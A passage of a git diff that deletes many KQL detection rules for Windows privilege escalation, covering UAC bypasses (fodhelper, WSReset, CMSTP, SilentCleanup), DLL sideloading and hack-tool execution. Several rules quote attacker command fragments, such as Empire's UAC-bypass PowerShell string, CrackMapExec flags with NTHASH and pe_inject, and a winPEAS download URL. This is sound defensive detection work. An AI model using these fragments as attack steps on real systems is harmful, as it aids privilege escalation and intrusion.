"sc.exe", "Get-Service"...etc. (Works only in powershell 7) -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD") \ No newline at end of file diff --git a/Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql b/Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql deleted file mode 100644 index 8dbd183f..00000000 --- a/Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Semanur Guneysu @semanurtg, oscd.community -// Date: 2020/10/28 -// Level: high -// Description: Detection of unusual child processes by different system processes -// Tags: attack.privilege_escalation, attack.t1548 -DeviceProcessEvents -| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "Cmd.Exe"))) and ((InitiatingProcessFolderPath endswith "\\winlogon.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains " route " and ProcessCommandLine contains " ADD "))) \ No newline at end of file diff --git a/Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql b/Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql deleted file mode 100644 index d7eb1414..00000000 --- a/Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community -// Date: 2020/10/13 -// Level: medium -// Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell" -// Tags: attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((InitiatingProcessFolderPath contains "\\Windows\\Installer\\" and InitiatingProcessFolderPath contains "msi") and InitiatingProcessFolderPath endswith "tmp") \ No newline at end of file diff --git a/Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql b/Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql deleted file mode 100644 index 0c2064b2..00000000 --- a/Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community -// Date: 2020/10/13 -// Level: medium -// Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege -// Tags: attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (((FolderPath contains "\\Windows\\Installer\\" and FolderPath contains "msi") and FolderPath endswith "tmp") or (FolderPath endswith "\\msiexec.exe" and ProcessIntegrityLevel =~ "System")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\Avast Software\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avast Software\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Avira\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\Google\\Update\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Google\\Update\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe" or (ProcessCommandLine endswith "\\system32\\msiexec.exe /V" or InitiatingProcessCommandLine endswith "\\system32\\msiexec.exe /V") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Sophos\\"))) \ No newline at end of file diff --git a/Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql b/Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql deleted file mode 100644 index d35ec172..00000000 --- a/Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/22 -// Level: high -// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking -// Tags: attack.privilege_escalation, attack.persistence, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql b/Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql deleted file mode 100644 index 76abcf3f..00000000 --- a/Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/05 -// Level: high -// Description: Bypasses User Account Control using a fileless method -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceRegistryEvents -| where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute" \ No newline at end of file diff --git a/Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql b/Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql deleted file mode 100644 index 59a7340a..00000000 --- a/Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113, Nextron Systems -// Date: 2022/01/06 -// Level: high -// Description: Detects the setting of the environement variable "windir" to a non default value. -Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. -The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC. - -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceRegistryEvents -| where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%")) \ No newline at end of file diff --git a/Privilege Escalation/Bypass_UAC_via_CMSTP.kql b/Privilege Escalation/Bypass_UAC_via_CMSTP.kql deleted file mode 100644 index 8ff3d7ea..00000000 --- a/Privilege Escalation/Bypass_UAC_via_CMSTP.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019/10/24 -// Level: high -// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002, attack.t1218.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE") \ No newline at end of file diff --git a/Privilege Escalation/Bypass_UAC_via_Fodhelper.exe.kql b/Privilege Escalation/Bypass_UAC_via_Fodhelper.exe.kql deleted file mode 100644 index 99e8774a..00000000 --- a/Privilege Escalation/Bypass_UAC_via_Fodhelper.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community -// Date: 2019/10/24 -// Level: high -// Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. -// Tags: attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\fodhelper.exe" \ No newline at end of file diff --git a/Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql b/Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql deleted file mode 100644 index 3524a28c..00000000 --- a/Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth -// Date: 2019/10/24 -// Level: high -// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE"))) \ No newline at end of file diff --git a/Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql b/Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql deleted file mode 100644 index b950101f..00000000 --- a/Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nik Seetharaman, Christian Burkard (Nextron Systems) -// Date: 2019/07/31 -// Level: high -// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65) -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001 -DeviceProcessEvents -| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe" \ No newline at end of file diff --git a/Privilege Escalation/COM_Hijack_via_Sdclt.kql b/Privilege Escalation/COM_Hijack_via_Sdclt.kql deleted file mode 100644 index 91b9bc53..00000000 --- a/Privilege Escalation/COM_Hijack_via_Sdclt.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Omkar Gudhate -// Date: 2020/09/27 -// Level: high -// Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute' -// Tags: attack.privilege_escalation, attack.t1546, attack.t1548 -DeviceRegistryEvents -| where RegistryKey contains "\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute" \ No newline at end of file diff --git a/Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql b/Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql deleted file mode 100644 index 973ed62c..00000000 --- a/Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), fornotes -// Date: 2022/12/01 -// Level: medium -// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). -Usually this technique is used to achieve DLL hijacking. - -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceFileEvents -| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll" \ No newline at end of file diff --git a/Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql b/Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql deleted file mode 100644 index 056a9e92..00000000 --- a/Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali -// Date: 2022/07/30 -// Level: high -// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) -but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack - -// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002 -DeviceFileEvents -| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\") \ No newline at end of file diff --git a/Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql b/Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql deleted file mode 100644 index 29170ff9..00000000 --- a/Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/01 -// Level: high -// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. -Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter - -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\ShellChromeAPI.dll" \ No newline at end of file diff --git a/Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql b/Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql deleted file mode 100644 index 5f8aed77..00000000 --- a/Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: omkar72, oscd.community -// Date: 2020/10/14 -// Level: high -// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. -// Tags: attack.execution, attack.privilege_escalation, attack.t1055 -DeviceImageLoadEvents -| where (FolderPath endswith "\\clr.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\mscorlib.dll") and (InitiatingProcessFolderPath endswith "\\cmstp.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\msxsl.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") \ No newline at end of file diff --git a/Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql b/Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql deleted file mode 100644 index 37c43d0b..00000000 --- a/Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops) -// Date: 2020/09/10 -// Level: medium -// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured. -// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.012 -DeviceRegistryEvents -| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH" \ No newline at end of file diff --git a/Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql b/Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql deleted file mode 100644 index 2272759d..00000000 --- a/Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/25 -// Level: high -// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. -// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201 -DeviceProcessEvents -| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 ")) \ No newline at end of file diff --git a/Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql b/Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql deleted file mode 100644 index a4dbd554..00000000 --- a/Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ecco -// Date: 2019/08/30 -// Level: critical -// Description: Detects some Empire PowerShell UAC bypass methods -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001 -DeviceProcessEvents -| where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);" \ No newline at end of file diff --git a/Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql b/Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql deleted file mode 100644 index 38bdaaa1..00000000 --- a/Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/27 -// Level: high -// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1134.001, attack.t1134.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe") \ No newline at end of file diff --git a/Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql b/Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql deleted file mode 100644 index 335281d7..00000000 --- a/Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/08/20 -// Level: critical -// Description: Detects the use of SharpUp, a tool for local privilege escalation -// Tags: attack.privilege_escalation, attack.t1615, attack.t1569.002, attack.t1574.005 -DeviceProcessEvents -| where FolderPath endswith "\\SharpUp.exe" or ProcessVersionInfoFileDescription =~ "SharpUp" or (ProcessCommandLine contains "HijackablePaths" or ProcessCommandLine contains "UnquotedServicePath" or ProcessCommandLine contains "ProcessDLLHijack" or ProcessCommandLine contains "ModifiableServiceBinaries" or ProcessCommandLine contains "ModifiableScheduledTask" or ProcessCommandLine contains "DomainGPPPassword" or ProcessCommandLine contains "CachedGPPPassword") \ No newline at end of file diff --git a/Privilege Escalation/HackTool_-_WinPwn_Execution.kql b/Privilege Escalation/HackTool_-_WinPwn_Execution.kql deleted file mode 100644 index bd621578..00000000 --- a/Privilege Escalation/HackTool_-_WinPwn_Execution.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2023/12/04 -// Level: high -// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. - -// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003 -DeviceProcessEvents -| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1" \ No newline at end of file diff --git a/Privilege Escalation/HackTool_-_winPEAS_Execution.kql b/Privilege Escalation/HackTool_-_winPEAS_Execution.kql deleted file mode 100644 index 320e767a..00000000 --- a/Privilege Escalation/HackTool_-_winPEAS_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Georg Lauenstein (sure[secure]) -// Date: 2022/09/19 -// Level: high -// Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz -// Tags: attack.privilege_escalation, attack.t1082, attack.t1087, attack.t1046 -DeviceProcessEvents -| where ProcessCommandLine contains "https://github.com/carlospolop/PEASS-ng/releases/latest/download/" or (ProcessCommandLine contains " applicationsinfo" or ProcessCommandLine contains " browserinfo" or ProcessCommandLine contains " eventsinfo" or ProcessCommandLine contains " fileanalysis" or ProcessCommandLine contains " filesinfo" or ProcessCommandLine contains " processinfo" or ProcessCommandLine contains " servicesinfo" or ProcessCommandLine contains " windowscreds") or (InitiatingProcessCommandLine endswith " -linpeas" or ProcessCommandLine endswith " -linpeas") or (ProcessVersionInfoOriginalFileName =~ "winPEAS.exe" or (FolderPath endswith "\\winPEASany_ofs.exe" or FolderPath endswith "\\winPEASany.exe" or FolderPath endswith "\\winPEASx64_ofs.exe" or FolderPath endswith "\\winPEASx64.exe" or FolderPath endswith "\\winPEASx86_ofs.exe" or FolderPath endswith "\\winPEASx86.exe")) \ No newline at end of file diff --git a/Privilege Escalation/Interactive_AT_Job.kql b/Privilege Escalation/Interactive_AT_Job.kql deleted file mode 100644 index 47f1d4f1..00000000 --- a/Privilege Escalation/Interactive_AT_Job.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019/10/24 -// Level: high -// Description: Detects an interactive AT job, which may be used as a form of privilege escalation. -// Tags: attack.privilege_escalation, attack.t1053.002 -DeviceProcessEvents -| where ProcessCommandLine contains "interactive" and FolderPath endswith "\\at.exe" \ No newline at end of file diff --git a/Privilege Escalation/LiveKD_Driver_Creation.kql b/Privilege Escalation/LiveKD_Driver_Creation.kql deleted file mode 100644 index 7e5f529f..00000000 --- a/Privilege Escalation/LiveKD_Driver_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/16 -// Level: medium -// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging -// Tags: attack.defense_evasion, attack.privilege_escalation -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" \ No newline at end of file diff --git a/Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql b/Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql deleted file mode 100644 index 69e1685e..00000000 --- a/Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/16 -// Level: high -// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe". -// Tags: attack.defense_evasion, attack.privilege_escalation -DeviceFileEvents -| where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql b/Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql deleted file mode 100644 index 003653f9..00000000 --- a/Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/16 -// Level: high -// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump. -// Tags: attack.defense_evasion, attack.privilege_escalation -DeviceFileEvents -| where FolderPath =~ "C:\\Windows\\livekd.dmp" \ No newline at end of file diff --git a/Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql b/Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql deleted file mode 100644 index a55dc381..00000000 --- a/Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/08/12 -// Level: high -// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications -Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded - -// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002 -DeviceFileEvents -| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft" \ No newline at end of file diff --git a/Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql b/Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql deleted file mode 100644 index 2be19bac..00000000 --- a/Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Florian Roth -// Date: 2021/07/12 -// Level: high -// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013 -DeviceProcessEvents -| where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe")) \ No newline at end of file diff --git a/Privilege Escalation/Microsoft_Office_DLL_Sideload.kql b/Privilege Escalation/Microsoft_Office_DLL_Sideload.kql deleted file mode 100644 index 7003f77d..00000000 --- a/Privilege Escalation/Microsoft_Office_DLL_Sideload.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: high -// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE"))) \ No newline at end of file diff --git a/Privilege Escalation/Modify_Group_Policy_Settings.kql b/Privilege Escalation/Modify_Group_Policy_Settings.kql deleted file mode 100644 index 45d1feba..00000000 --- a/Privilege Escalation/Modify_Group_Policy_Settings.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/19 -// Level: medium -// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1484.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains 